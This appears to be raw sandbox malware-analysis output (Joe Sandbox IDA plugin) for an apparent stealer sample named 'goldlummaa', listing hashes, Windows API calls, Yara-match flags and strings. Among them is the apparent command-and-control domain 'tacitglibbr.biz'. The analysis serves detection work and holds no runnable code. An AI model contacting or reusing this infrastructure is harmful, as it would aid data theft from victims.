• Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
• Opcode Fuzzy Hash: 7cc7601ca1ee28cd6491a20fbffaf33e16e54dbc7ed2fef88dca781f2573c0e0
• Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

Control-flow Graph
[Graph not reproduced. First block: 40cff3-40d003. Calls in graph: 408660, 4361e0, 40ba00]
Similarity
• API ID:
• String ID: 277DB6F22143AFD2F9F1B7136A1E0C5E$BI$ZG$tacitglibbr.biz$3ej$pr
• API String ID: 0-1144176270
• Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
• Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

Control-flow Graph
[Graph not reproduced. First block: 408790-4087a1. Calls in graph: 43a360, ExitProcess, 4336c0, GetCurrentProcessId, GetCurrentThreadId, 43a930, SHGetSpecialFolderPathW, GetForegroundWindow, 409bc0, 40cb90, 40b9d0]
APIs
• GetCurrentProcessId.KERNEL32 ref: 004087B4
• GetCurrentThreadId.KERNEL32 ref: 004087BE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
• GetForegroundWindow.USER32 ref: 00408870
  • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
  • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32 ref: 0040B9F7
• ExitProcess.KERNEL32 ref: 00408972
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 3676751680-0
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
• Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Control-flow Graph
[Graph not reproduced. First block: 422e93-422e99. Calls in graph: 407f60, 43cb20, 407f70, 4210e0, 420df0, GetLogicalDrives]
Similarity
• API ID:
• String ID: )*$X9{;$r1B
• API String ID: 0-1001561910
• Opcode ID: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
• Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
• Opcode Fuzzy Hash: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
• Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A

Control-flow Graph
[Graph not reproduced. First block: 431839-43191a. Calls in graph: 414060, GetSystemMetrics (twice)]
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
• Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
• Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
• Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
• Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96

Control-flow Graph
[Graph not reproduced. First block: 40dd25-40dd53. Calls in graph: 431260, 409700, CoUninitialize, 40ba00]
Similarity
• API ID: Uninitialize
• String ID: PT$tacitglibbr.biz
• API String ID: 3861434553-1646754259
• Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
• Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
• Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
• Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: @$ihgf
                                                                                                                  • API String ID: 2994545307-73152791
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: 167H
                                                                                                                  • API String ID: 2994545307-2704650348
                                                                                                                  APIs
                                                                                                                  • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: ihgf
                                                                                                                  • API String ID: 2994545307-2948842496
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 840 435029-43508b call 43c280 call 414060 * 2 GetUserDefaultUILanguage 847 43508d-435090 840->847 848 435092-4350d8 847->848 849 4350da-435105 847->849 848->847
                                                                                                                  APIs
                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 0043506A
                                                                                                                  • API ID: DefaultLanguageUser
                                                                                                                  • String ID: YEBC
                                                                                                                  • API String ID: 95929093-3431656882

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 850 43ab0b-43ab1f 851 43ab20-43ab7b 850->851 851->851 852 43ab7d-43abce GetForegroundWindow call 43c7d0 851->852
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                  • API ID: ForegroundWindow
                                                                                                                  • String ID: ilmn
                                                                                                                  • API String ID: 2020703349-1560153188
                                                                                                                  APIs
                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040EA15
                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040EB5C
                                                                                                                  • API ID: Initialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2538663250-0
                                                                                                                  APIs
                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  • API ID: BlanketProxy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3890896728-0
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID: ForegroundWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2020703349-0
                                                                                                                  APIs
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E65A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID: InitializeSecurity
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 640775948-0
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID: FreeHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3298025750-0
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 00438E55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                  • String ID: ($P$W$]$j$x
                                                                                                                  • API String ID: 2832541153-1642767450
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                  • API String ID: 0-2246970021
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID:
                                                                                                                  • String ID: *mB$67$@iB$V3R5
                                                                                                                  • API String ID: 0-119712241
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0043A9B0: LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419CD6
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419D3B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                                  • String ID: ,)*k$I,~M
                                                                                                                  • API String ID: 764372645-936430989
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID:
                                                                                                                  • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                  • API String ID: 0-2430453506
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID:
                                                                                                                  • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                  • API String ID: 0-3264166258
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID:
                                                                                                                  • String ID: -$C\$Iz$[^$de
                                                                                                                  • API String ID: 0-3020956940
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID:
                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                  • API String ID: 0-923305466
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID:
                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                  • API String ID: 0-923305466
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • API ID:
                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                  • API String ID: 0-923305466
                                                                                                                  • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                  • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                  • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                  • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                  APIs
                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6C03B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1974802433-0
                                                                                                                  • Opcode ID: 70847c87b908b640aec5e551f86c9b078fd5586ef18c3ec4b20d90a015b5aada
                                                                                                                  • Instruction ID: 32d7f3d584145d55f497afef2134fa98db052c4f1e0f86b337cf88ddd0a7a708
                                                                                                                  • Opcode Fuzzy Hash: 70847c87b908b640aec5e551f86c9b078fd5586ef18c3ec4b20d90a015b5aada
                                                                                                                  • Instruction Fuzzy Hash: 4471D1B5905128AFDF30AF68CCC9ABEB7B8AB05300F1441D9E058E7252EB314EC59F11
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C65033
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00C650FF
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C65118
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00C65122
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 254469556-0
                                                                                                                  • Opcode ID: c8d50878ab34e04dc6952cb614d136101c9359d68544a310185e8a492ab318dc
                                                                                                                  • Instruction ID: 2a1c59e72245fffbd21885f4ccb2ffdf4baf5f9aff0982ca9a9f2590486e9e88
                                                                                                                  • Opcode Fuzzy Hash: c8d50878ab34e04dc6952cb614d136101c9359d68544a310185e8a492ab318dc
                                                                                                                  • Instruction Fuzzy Hash: 2931D575D05219DBDF21DFA4D9897CDBBB8BF08300F1041AAE50DAB250EB719B889F45
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: &-$)R_X$[O_[$zusR
                                                                                                                  • API String ID: 0-3432275560
                                                                                                                  • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                  • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                  • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                  • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                  • API String ID: 0-2418547040
                                                                                                                  • Opcode ID: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                  • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                  • Opcode Fuzzy Hash: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                                                                                  • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 67$V3R5$dB
                                                                                                                  • API String ID: 0-2543814982
                                                                                                                  • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                  • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                  • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                  • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: BE$de
                                                                                                                  • API String ID: 0-1272349043
                                                                                                                  • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                  • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                  • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                  • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: AzB$`rB
                                                                                                                  • API String ID: 0-365317308
                                                                                                                  • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                  • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                  • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                  • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: AzB$`rB
                                                                                                                  • API String ID: 0-365317308
                                                                                                                  • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                  • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                  • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                  • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: c$
                                                                                                                  • API String ID: 0-2516980088
                                                                                                                  • Opcode ID: 3c7936fc6ee2aea87740d9eaff8fe823a77b75e4903c792a35abcdd5a2d9dcbb
                                                                                                                  • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                  • Opcode Fuzzy Hash: 3c7936fc6ee2aea87740d9eaff8fe823a77b75e4903c792a35abcdd5a2d9dcbb
                                                                                                                  • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: A67H
                                                                                                                  • API String ID: 0-3389657328
                                                                                                                  • Opcode ID: c8e58b8bc47f8f660499b6455e80629c0afce5cc1bbea26fbd3bc9902617d378
                                                                                                                  • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                  • Opcode Fuzzy Hash: c8e58b8bc47f8f660499b6455e80629c0afce5cc1bbea26fbd3bc9902617d378
                                                                                                                  • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: ,)*k
                                                                                                                  • API String ID: 2994545307-1228391949
                                                                                                                  • Opcode ID: 869930153e3630061cfc2212e87621c06b0f7d623c5796ac555c0ebedb5d3c29
                                                                                                                  • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                  • Opcode Fuzzy Hash: 869930153e3630061cfc2212e87621c06b0f7d623c5796ac555c0ebedb5d3c29
                                                                                                                  • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: m
                                                                                                                  • API String ID: 0-3775001192
                                                                                                                  • Opcode ID: 844987965f40079c61b601cedf19b759f80ba459d70370987815db4daec65b09
                                                                                                                  • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                  • Opcode Fuzzy Hash: 844987965f40079c61b601cedf19b759f80ba459d70370987815db4daec65b09
                                                                                                                  • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • API ID:
                                                                                                                  • String ID: .
                                                                                                                  • API String ID: 0-1505114982
                                                                                                                  • API ID:
                                                                                                                  • String ID: &#
                                                                                                                  • API String ID: 0-1789715784
                                                                                                                  • API ID:
                                                                                                                  • String ID: .
                                                                                                                  • API String ID: 0-1505114982
                                                                                                                  Strings
                                                                                                                  • 277DB6F22143AFD2F9F1B7136A1E0C5E, xrefs: 004097D3
                                                                                                                  • API ID:
                                                                                                                  • String ID: 277DB6F22143AFD2F9F1B7136A1E0C5E
                                                                                                                  • API String ID: 0-2259407529
                                                                                                                  • API ID:
                                                                                                                  • String ID: ~
                                                                                                                  • API String ID: 0-1707062198
                                                                                                                  • API ID:
                                                                                                                  • String ID: RpB
                                                                                                                  • API String ID: 0-664042118
                                                                                                                  • API ID:
                                                                                                                  • String ID: d1
                                                                                                                  • API String ID: 0-4211392460
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: ihgf
                                                                                                                  • API String ID: 2994545307-2948842496
                                                                                                                  • API ID:
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 0-123907689
                                                                                                                  • API ID:
                                                                                                                  • String ID: w
                                                                                                                  • API String ID: 0-2991200456
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: ihgf
                                                                                                                  • API String ID: 2994545307-2948842496
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                  • Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
                                                                                                                  • Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                  • Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ff0b5ad84a3f607bb1e1ea8d3abea420a90813bc2cfe91ef12883cc8515d7bd3
                                                                                                                  • Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
                                                                                                                  • Opcode Fuzzy Hash: ff0b5ad84a3f607bb1e1ea8d3abea420a90813bc2cfe91ef12883cc8515d7bd3
                                                                                                                  • Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
